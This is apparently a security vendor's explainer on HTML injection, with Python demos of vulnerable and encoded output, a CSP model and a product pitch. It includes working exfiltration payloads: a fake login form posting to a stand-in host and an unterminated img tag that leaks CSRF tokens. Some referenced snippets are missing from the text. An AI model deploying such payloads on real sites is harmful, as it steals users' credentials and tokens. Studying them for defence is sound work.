HTML Injection - What is it?
HTML injection is a common web vulnerability that abuses weak handling of user input. Most web pages are built with HTML (Hypertext Markup Language), which tells the browser how to lay out and display the page's content. Through the language's presentational elements, developers decide how a page looks when it is rendered.
Modern web pages are highly interactive, and earlier user actions (a comment, a search, a submitted form) frequently shape what the page displays next.
When that user input is not validated or encoded, the page or application is vulnerable to attack.
Attackers take advantage of this loophole to inject HTML. They craft input that, when written into the response of an HTML-based application, is rendered by the browser as part of the page's own markup rather than displayed as data.
How Does HTML Injection Work?
Functionally, HTML injection looks very similar to XSS, as both follow the same delivery path: the attacker places markup in an unvalidated input, and the browser treats it as an integral part of the targeted page's HTML. The difference is that HTML injection covers plain markup (forms, links, images, text); it becomes XSS only when the injected content contains script that executes.
The prime target of this attack is the user's browser, not the web server. The server merely echoes the payload; the damage occurs where the page is rendered.
In terms of intent, HTML injection usually serves one of two goals:
- To modify the website's appearance so that the site's reputation is tarnished
- To steal the identity or credentials of an authorized user
The attack is executed using the links and data input fields of the targeted website.
To carry out the attack, attackers start by finding inputs whose values are written back into a page without encoding. Comments, search boxes and contact forms are the usual entry points: they are used by many visitors and are often built with less care than the rest of the site.
For instance, an attacker can post an engaging comment containing HTML snippets that redirect readers to a malicious page or prompt them to download malware. Let's explain how the attack works using the kind of questionnaire form most websites provide so that users can submit their concerns and queries.
When a user fills out such a questionnaire form, details like the concern, name, email address and phone number are submitted. On submission, an acknowledgment message is displayed immediately. To the user, this acknowledgment message looks like this:
The corresponding code for this message will be:
Because the submitted values are concatenated straight into this code without encoding, an attacker has no trouble inserting markup of their own.
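As an added example (not code from the original page), here is the acknowledgment step rebuilt in Python in two versions: one that concatenates the submitted name straight into the page, and one that HTML-encodes it first. The template text, the field name and the fake-login payload pointing at example.com are assumptions for illustration.

```python
import html

# Added example, not code from the original page. The template text, the
# field name and the payload URL (example.com) are assumptions.

TEMPLATE = "<p>Thank you, {name}! We have received your query.</p>"

def render_ack_vulnerable(name: str) -> str:
    """Builds the acknowledgment by concatenating the submitted name as-is.
    Whatever markup the user typed becomes part of the page: HTML injection."""
    return TEMPLATE.format(name=name)

def render_ack_safe(name: str) -> str:
    """Same page, but the untrusted value is HTML-encoded first. quote=True
    also encodes ' and ", so the value cannot break out of an attribute
    either, should the template ever place it inside one."""
    return TEMPLATE.format(name=html.escape(name, quote=True))

# Payload a visitor might submit as their "name": it closes the paragraph,
# plants a fake login form that posts to an attacker-controlled host, then
# reopens a paragraph so the rest of the page still renders cleanly.
FAKE_LOGIN = (
    '</p><form action="http://example.com/steal" method="post">'
    "Your session expired, please log in again:<br>"
    '<input name="user"><input name="pass" type="password">'
    '<input type="submit" value="Log in"></form><p>'
)

def has_live_form(page: str) -> bool:
    """Crude check for the demo only: does the rendered page contain a real
    <form> tag (as opposed to the harmless text '&lt;form')?"""
    return "<form" in page.lower()

if __name__ == "__main__":
    print(render_ack_vulnerable(FAKE_LOGIN))
    print(render_ack_safe(FAKE_LOGIN))
```

In a real application this encoding belongs in the template engine's autoescaping rather than in hand-written calls, and the encoding has to match the context the value lands in (text, attribute, URL or script), since entity encoding alone is not enough inside a script block or a URL.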
Consequences of the Attack
When successful, an HTML injection attack can lead to multiple security concerns that include:
XSS attacks: HTML injection is one of the techniques threat actors use to stage an XSS attack against a set of users. Through it, attackers can obtain key information like user credentials and payment details and use them for harmful actions such as draining a bank account or taking over important accounts.
Website defacement: Attackers use HTML injection to deface websites, since the method lets them modify page content. They can make a page display offensive content or render a site unusable.
Dispersal of malware: Attackers often use HTML injection and related code injection techniques to distribute malware to a site's visitors at scale.
Loss of trust: When a website is unresponsive or displays inappropriate content, users no longer feel comfortable using it, and user engagement drops sharply.
Types of HTML Injection
There are two HTML injection varieties that attackers use.
Reflected HTML injection is the more common variety. The payload travels in the request (a crafted link or a submitted form) and is echoed back in the response to that one victim, so the payload has to be delivered to each target individually. There is no bulk delivery, so it takes more effort per victim, but it is reliable because the attacker controls exactly what is reflected into the page.
Stored HTML injection involves a payload that the application saves server-side (in a comment, a profile field, a product review) and renders on every later page view. Attackers use this variety when they want to hit many users at once: a single stored payload is served to everyone who loads the affected page.
Based on the HTTP method used, reflected HTML injection is further divided into three categories: reflected GET, reflected POST and reflected URL. Reflected URL means the payload is placed in the page's own URL and that URL is echoed into the page.
In reflected GET the payload arrives in a query parameter of a request that fetches data; in reflected POST it arrives in the body of a request that submits data. Attackers check the page source to learn which method a given element uses.
For instance, a threat actor inspects the login form's source code to find out which injection method applies to it.
HTML Injection Example
Depending on the purpose of the attack, attackers use several kinds of HTML injection payloads. Here are examples of the most commonly used techniques.
- Exfiltrating sensitive user data
Collecting sensitive data of specific users is another very common use of this attack. Attackers inject payloads into website forms built to collect data such as user name, email and contact details.
Contact forms, questionnaires and comments are typical examples of such forms. Attackers use them to plant markup that presents a counterfeit login prompt, so that credentials entered into it are sent to a server the attacker controls.
In the case of a page that relies on URLs, attackers use the tag to acquire sensitive data.
The snippet href='http://example.com/'> is what bad actors supply to substitute a URL of their own for the page's.
In addition, attackers can capture submissions to fully valid HTML forms by inserting their own tag before the legitimate one.
- Exfiltrating anti-CSRF tokens
If attackers are planning an elaborate CSRF attack, they use HTML injection payloads to exfiltrate the anti-CSRF token that the page carries in a hidden input of a form.
The payload is a non-terminated tag whose URL attribute is opened with a single quote, such as <img src='http://example.com/record.php?.
Because the quote is never closed, the browser treats everything that follows, up to the next single quote in the document, as part of the URL. If the page's own markup uses double quotes, that span includes the hidden input and its token value, and the whole fragment is sent to the attacker-controlled record.php script, where it is recorded as:
Alternatively, attackers can use the tag to exfiltrate the CSRF token. With this technique, the content after the tag is submitted as the input's value until the and tags are closed.
However, this variant only works if the user submits the form manually.
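As an added example (not from the original page), the following Python code models the unterminated-tag trick described above for the hidden-token case, and goes one step further by showing why the quoting style of the surrounding page decides whether the token leaks. The page fragment, the token value, the field names and the record.php URL are all constructed assumptions.

```python
import html
from typing import Optional

# Added example, not code from the original page. Constructed page fragment:
# a comment reflected without encoding, followed by the site's own form with
# an anti-CSRF token in a hidden input, and a footer that happens to contain
# an apostrophe. Token value, URLs and field names are assumptions.

PAYLOAD = "<img src='http://example.com/record.php?"

def build_page(reflected: str, q: str = '"') -> str:
    """Render the fragment; q is the quote character the site's own markup uses."""
    return (
        f"<div class={q}comment{q}>{reflected}</div>\n"
        f"<form action={q}/transfer{q} method={q}post{q}>\n"
        f"<input type={q}hidden{q} name={q}csrf_token{q} value={q}s3cr3t-token-42{q}>\n"
        f"<input type={q}submit{q} value={q}Send{q}>\n"
        "</form>\n"
        "<p>Don't forget to log out.</p>\n"
    )

def reflect_safely(value: str) -> str:
    """The fix: HTML-encode the reflected value so ' becomes &#x27; and the
    tag never opens."""
    return html.escape(value, quote=True)

def swallowed_src_value(page: str) -> Optional[str]:
    """Model the HTML tokenizer's single-quoted attribute state: the src
    value runs from the opening ' to the next ' anywhere in the document.
    If no closing quote exists, the tag is never emitted (EOF inside a tag)
    and nothing is requested. Returns the value the browser would fetch,
    or None. (Browsers also percent-encode whitespace; omitted here.)"""
    start = page.find(PAYLOAD)
    if start == -1:
        return None                      # payload encoded or absent
    value_start = start + len("<img src='")
    end = page.find("'", value_start)
    if end == -1:
        return None                      # unterminated to EOF: no request
    return page[value_start:end]

def token_leaks(page: str) -> bool:
    """Does the URL the browser requests carry the hidden token?"""
    value = swallowed_src_value(page)
    return value is not None and "s3cr3t-token-42" in value

if __name__ == "__main__":
    print(token_leaks(build_page(PAYLOAD, '"')))            # page uses double quotes: leaks
    print(token_leaks(build_page(PAYLOAD, "'")))            # page uses single quotes: URL ends early
    print(token_leaks(build_page(reflect_safely(PAYLOAD)))) # encoded: no tag, no request
```

With double-quoted site markup the swallowed value runs through the hidden input up to the apostrophe in the footer, so the token ends up in the request to record.php; with single-quoted markup the value stops at the first attribute of the site's own form, and with proper encoding the payload never becomes a tag at all.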
- Defacing the website
Perhaps the most visible example of this attack is defacing, which simply means changing a website's appearance by modifying certain visual components.
For instance, attackers can inject HTML into the ad placements a business displays across its pages.
Defacing is mainly done to harm the brand reputation of a business's website or page.
- Exfiltrating passwords stored in the browser
Lastly, HTML injection is widely used to extract credentials that the browser's password manager has saved for the site. The attacker injects a login form whose field names match the site's real one; because the injected form sits on the same origin, the password manager may auto-fill the saved credentials into it, and the form then submits them to the attacker.
How is This Attack Different From the Others?
The landscape of web vulnerabilities is so diverse that many attacks share strong similarities, XSS and HTML injection for example. Yet no two weaknesses are identical; they overlap only in part.
HTML injection is more powerful when it comes to altering a website's appearance and user experience. The other attacks mentioned above are rarely concerned with changing how a site looks, whereas HTML injection can alter crucial page elements and affect both usability and user experience.
As websites play a crucial role in brand building and customer reach, businesses cannot take HTML injection lightly just because it poses a minimal threat to databases.
When it comes to data theft, XSS and HTML injection work in a very similar fashion: both are delivered through HTML and both aim to steal user identity information.
Mitigation and Prevention of HTML Injection
No cyber risk should be taken lightly. AppSec professionals must have appropriate remedies in place to fix, prevent and mitigate any sort of vulnerability as soon as possible. Below are some viable ways to control the spread and risk of HTML injection.
- The first and foremost prevention principle is to validate input and encode output: the attack only works against input that is neither verified nor encoded when written back into the page. Encoding means converting <, >, &, " and ' into their HTML entities so the browser displays them as text instead of interpreting them as markup.
- Second, inspect every input for HTML or script markup; many tools help with this. Treat such checks as a supplementary signal rather than the primary control, because output encoding is what actually neutralizes a payload.
- Adopting good security testing practices is also very effective at limiting these attacks. Use automated testing tools so that no website component is left untested.
- For mitigation, a WAF or Web Application Firewall is a useful technique: it can block requests that carry HTML payloads before they reach the application, so injected markup never becomes part of stored or reflected input. A CSP or Content Security Policy also helps; directives such as form-action and base-uri stop an injected form or base URL from sending data to another origin. CSP does not, however, prevent the markup itself from being rendered, and it is not applicable in every use case, so it must be combined with the other controls.
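As an added example (not from the original page), here is the CSP header a server can send so that an injected form or base tag cannot hand user input to another origin, together with a deliberately simplified Python model of how the browser applies the form-action directive. The policy string and URLs are assumptions, and the matching below covers only 'self', 'none' and explicit origins; real CSP also handles paths, wildcards and scheme-only sources.

```python
from urllib.parse import urljoin, urlsplit

# Added example, not from the original page. The policy string and URLs are
# assumptions; the matching below is a simplified model of the browser's CSP
# form-action check (real CSP also handles paths, wildcards, scheme-only
# sources and more).

CSP = "default-src 'self'; form-action 'self'; base-uri 'none'"

def security_headers() -> dict:
    """Headers to send with every HTML response: form-action stops an
    injected <form> from posting off-site, base-uri stops an injected
    <base> from rewriting where relative URLs (and form actions) resolve."""
    return {
        "Content-Security-Policy": CSP,
        "Content-Type": "text/html; charset=utf-8",
    }

def directive(policy: str, name: str) -> list:
    """Return the source list of one directive, or [] if it is absent."""
    for part in policy.split(";"):
        tokens = part.split()
        if tokens and tokens[0].lower() == name:
            return tokens[1:]
    return []

def _origin(url: str) -> str:
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()

def form_submission_allowed(policy: str, page_url: str, action: str) -> bool:
    """Would the browser let a form on page_url submit to action?
    form-action has no fallback to default-src: with no directive, anything
    goes. 'none' blocks everything; 'self' allows the page's own origin;
    an explicit origin allows exactly that origin."""
    sources = directive(policy, "form-action")
    if not sources:
        return True
    if "'none'" in sources:
        return False
    target = _origin(urljoin(page_url, action))   # relative action -> same origin
    for src in sources:
        if src == "'self'" and target == _origin(page_url):
            return True
        if not src.startswith("'") and "://" in src and _origin(src) == target:
            return True
    return False

if __name__ == "__main__":
    page = "https://shop.example/contact"
    print(security_headers())
    print(form_submission_allowed(CSP, page, "/contact"))                  # same origin: allowed
    print(form_submission_allowed(CSP, page, "http://example.com/steal"))  # injected form: blocked
```

The point of the model is the caveat in the text: the injected form is still rendered and the user may still type into it, but with form-action restricted the browser refuses to send the submission to the attacker's origin, and with base-uri 'none' an injected base tag cannot redirect the site's own relative form actions.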
HTML Injection Protection with Wallarm
Even though HTML injection poses little direct threat to databases, organizations should not overlook it; they should take appropriate action to limit its impact and, where possible, prevent it from happening.
Wallarm provides a range of solutions that enterprises can deploy in any cloud environment to control HTML injection. For instance, its cloud-based WAAP inspects requests to every part of the application in real time and blocks attempts to inject markup into them.
The tool does not rely on outdated regex-based signatures for detection, which reduces false positives and false negatives. With one tool, enterprises can protect APIs, microservices and cloud ecosystems alike.
While Wallarm's own WAF is one option, Wallarm also provides an advanced WAF testing tool for those running a customized WAF. GoTestWAF is a Wallarm platform that lets organizations check how their WAF behaves in practice and whether it provides meaningful protection against HTML injection attacks.
For accurate detection of HTML injection and similar issues, you can also use API security and testing tools that scan the code itself and report any vulnerabilities they find.